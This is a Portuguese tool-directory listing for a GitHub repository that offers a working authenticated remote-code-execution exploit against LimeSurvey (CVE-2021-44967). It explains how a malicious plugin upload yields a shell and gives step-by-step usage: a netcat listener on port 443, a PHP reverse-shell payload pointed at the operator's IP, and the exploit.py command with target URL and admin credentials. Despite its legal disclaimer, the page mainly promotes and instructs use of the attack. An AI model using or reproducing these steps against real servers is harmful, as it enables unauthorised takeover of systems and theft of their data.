Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
-Limesurvey-RCE-CVE-2021-44967 — 🔥 Exploit de RCE automatizado para Limesurvey (CVE-2021-44967). Cadeia de exploração otimizada para escalada de privilégios. 🚀 | Kitploit
Ferramentas/GitHubGitHub/kikechans/-limesurvey-rce-cve-2021-44967
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubkikechans/-limesurvey-rce-cve-2021-44967

-Limesurvey-RCE-CVE-2021-44967

🔥 Exploit de RCE automatizado para Limesurvey (CVE-2021-44967). Cadeia de exploração otimizada para escalada de privilégios. 🚀

Ver Repositório
2há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚀 LimeSurvey RCE (CVE-2021-44967) - Execução Remota de Código Autenticada

Este repositório contém um exploit funcional para CVE-2021-44967, uma vulnerabilidade de Execução Remota de Código autenticada no LimeSurvey.

🎯 Compatibilidade

Testado e confirmado funcionando em:

  • LimeSurvey 5.2.x
  • LimeSurvey 6.x

🐛 Visão Geral da Vulnerabilidade

A vulnerabilidade permite que um usuário autenticado com privilégios administrativos carregue um plugin malicioso. Como o LimeSurvey não valida rigorosamente o conteúdo do ZIP do plugin nem impede a execução de arquivos PHP no diretório do plugin, um atacante pode obter RCE acessando diretamente o shell carregado.

✨ Recursos

  • 🤖 Exploração Automatizada: Faz login, lida com tokens CSRF, carrega, instala e ativa o plugin automaticamente.
  • ✅ Compatibilidade Melhorada: config.xml atualizado para compatibilidade com as versões 3.0 a 6.0 do LimeSurvey.
  • 💣 Payloads Flexíveis: Inclui um shell reverso PHP robusto.

🛠️ Uso

1️⃣ Prepare seu Listener

Inicie um listener netcat na sua máquina:

nc -lvnp 443

2️⃣ Configure o Shell Reverso

Edite php-rev.php e defina seu IP local e porta:

$ip = '<YOUR_IP>';
$port = 443;

3️⃣ Execute o Exploit

python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>

Exemplo:

python3 exploit.py http://10.129.1.243/survey admin test

📁 Estrutura do Repositório

  • 🐍 exploit.py: O script principal de automação.
  • 🐘 php-rev.php: Payload de shell reverso PHP.
  • ⚙️ config.xml: Arquivo de configuração obrigatório do plugin LimeSurvey.

⚠️ Aviso Legal

Esta ferramenta é somente para fins educacionais e testes de segurança autorizados. Destinada estritamente ao uso em ambientes controlados e legais (por exemplo, CTFs, ambientes de laboratório ou engajamentos autorizados). O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta. Use-a com responsabilidade e somente em sistemas nos quais você tenha permissão explícita para testar.

Baixar ferramenta